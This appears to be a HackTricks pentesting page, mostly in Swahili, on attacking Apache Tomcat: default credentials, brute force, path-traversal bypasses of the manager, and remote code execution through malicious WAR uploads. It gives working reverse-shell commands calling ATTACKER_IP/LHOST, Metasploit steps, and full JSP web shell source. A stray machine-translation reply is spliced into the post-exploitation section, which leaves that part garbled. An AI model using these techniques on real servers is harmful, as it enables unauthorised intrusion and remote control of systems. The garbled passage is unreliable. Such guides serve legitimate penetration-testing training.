# Tomcat

{{#include ../../../banners/hacktricks-training.md}}

## Discovery

- Kawaida inafanya kazi kwenye **port 8080**
- **Kosa la kawaida la Tomcat:**

<figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>

## Enumeration

### **Version Identification**

Ili kupata toleo la Apache Tomcat, amri rahisi inaweza kutekelezwa:
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
Hii itatafuta neno "Tomcat" katika ukurasa wa index wa hati, ikifunua toleo katika tag ya kichwa ya jibu la HTML.

### **Mahali pa Faili za Meneja**

Kutambua maeneo halisi ya **`/manager`** na **`/host-manager`** ni muhimu kwani majina yao yanaweza kubadilishwa. Tafutizi ya nguvu inashauriwa ili kupata kurasa hizi.

### **Uainishaji wa Jina la Mtumiaji**

Kwa toleo za Tomcat zilizopita ya 6, inawezekana kuainisha majina ya watumiaji kupitia:
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **Default Credentials**

Direktori **`/manager/html`** ni nyeti sana kwani inaruhusu kupakia na kutekeleza faili za WAR, ambazo zinaweza kusababisha utekelezaji wa msimbo. Direktori hii inalindwa na uthibitishaji wa msingi wa HTTP, huku akidi za kawaida zikiwa:

- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat

Akidi hizi zinaweza kupimwa kwa kutumia:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
Maktaba nyingine muhimu ni **`/manager/status`**, ambayo inaonyesha toleo la Tomcat na OS, ikisaidia katika kutambua udhaifu.

### **Shambulio la Brute Force**

Ili kujaribu shambulio la brute force kwenye saraka ya meneja, mtu anaweza kutumia:
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
Pamoja na kuweka vigezo mbalimbali katika Metasploit ili kulenga mwenyeji maalum.

## Uthibitisho wa Kawaida

### **Ufunuo wa Nywila ya Backtrace**

Kufikia `/auth.jsp` kunaweza kufichua nywila katika backtrace chini ya hali nzuri.

### **Ukodishaji wa URL Mara Mbili**

Uthibitisho wa CVE-2007-1860 katika `mod_jk` unaruhusu ukodishaji wa URL mara mbili kwa ajili ya kupita njia, ukiruhusu ufikiaji usioidhinishwa wa kiolesura cha usimamizi kupitia URL iliyoundwa kwa njia maalum.

Ili kufikia wavuti ya usimamizi ya Tomcat nenda: `pathTomcat/%252E%252E/manager/html`

### /examples

Toleo la Apache Tomcat 4.x hadi 7.x linajumuisha skripti za mfano ambazo zinaweza kuathiriwa na ufunuo wa taarifa na mashambulizi ya cross-site scripting (XSS). Skripti hizi, zilizoorodheshwa kwa kina, zinapaswa kuangaliwa kwa ufikiaji usioidhinishwa na uwezekano wa kutumiwa vibaya. Pata [maelezo zaidi hapa](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)

- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp

### **Ushambuliaji wa Kupita Njia**

Katika [**mipangilio yenye udhaifu ya Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) unaweza kupata ufikiaji wa saraka zilizolindwa katika Tomcat kwa kutumia njia: `/..;/`

Hivyo, kwa mfano, unaweza kuwa na uwezo wa **kufikia ukurasa wa usimamizi wa Tomcat** kwa kufikia: `www.vulnerable.com/lalala/..;/manager/html`

**Njia nyingine** ya kupita njia zilizolindwa kwa kutumia hila hii ni kufikia `http://www.vulnerable.com/;param=value/manager/html`

## RCE

Hatimaye, ikiwa una ufikiaji wa Meneja wa Programu ya Wavuti ya Tomcat, unaweza **kupakia na kutekeleza faili ya .war (tekeleza msimbo)**.

### Mipaka

Utakuwa na uwezo wa kupakia WAR tu ikiwa una **mamlaka ya kutosha** (majukumu: **admin**, **manager** na **manager-script**). Maelezo hayo yanaweza kupatikana chini ya _tomcat-users.xml_ ambayo kawaida huwekwa katika `/usr/share/tomcat9/etc/tomcat-users.xml` (inategemea toleo) (angalia [POST ](#post)section).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom Reverse Shell

1. Tengeneza war ili kupeleka:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
```
2. Pakia faili la `revshell.war` na upate ufikiaji wake (`/revshell/`):

### Bind na reverse shell na [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)

Katika baadhi ya hali hii haifanyi kazi (kwa mfano toleo za zamani za sun)

#### Pakua
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### Reverse shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### Bind shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### Kutumia [Culsterd](https://github.com/hatRiot/clusterd)
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### Manual method - Web shell

Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
```java
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>
```

```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
Unaweza pia kufunga hii (inaruhusu kupakia, kupakua na kutekeleza amri): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)

### Manual Method 2

Pata JSP web shell kama [hii](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) na uunde faili la WAR:
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST

Jina la faili la akreditivu za Tomcat ni `tomcat-users.xml` na faili hii inaonyesha jukumu la mtumiaji ndani ya tomcat.
```bash
find / -name tomcat-users.xml 2>/dev/null
```
I'm ready to assist you with the translation. Please provide the text you would like to have translated.
```xml
[...]
<!--
By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application.  If you wish to use this app,
you must define such a user - the username and password are arbitrary.

Built-in Tomcat manager roles:
- manager-gui    - allows access to the HTML GUI and the status pages
- manager-script - allows access to the HTTP API and the status pages
- manager-jmx    - allows access to the JMX proxy and the status pages
- manager-status - allows access to the status pages only
-->
[...]
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
```
## Zana nyingine za skanning za tomcat

- [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)

## Marejeleo

- [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
- [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)

{{#include ../../../banners/hacktricks-training.md}}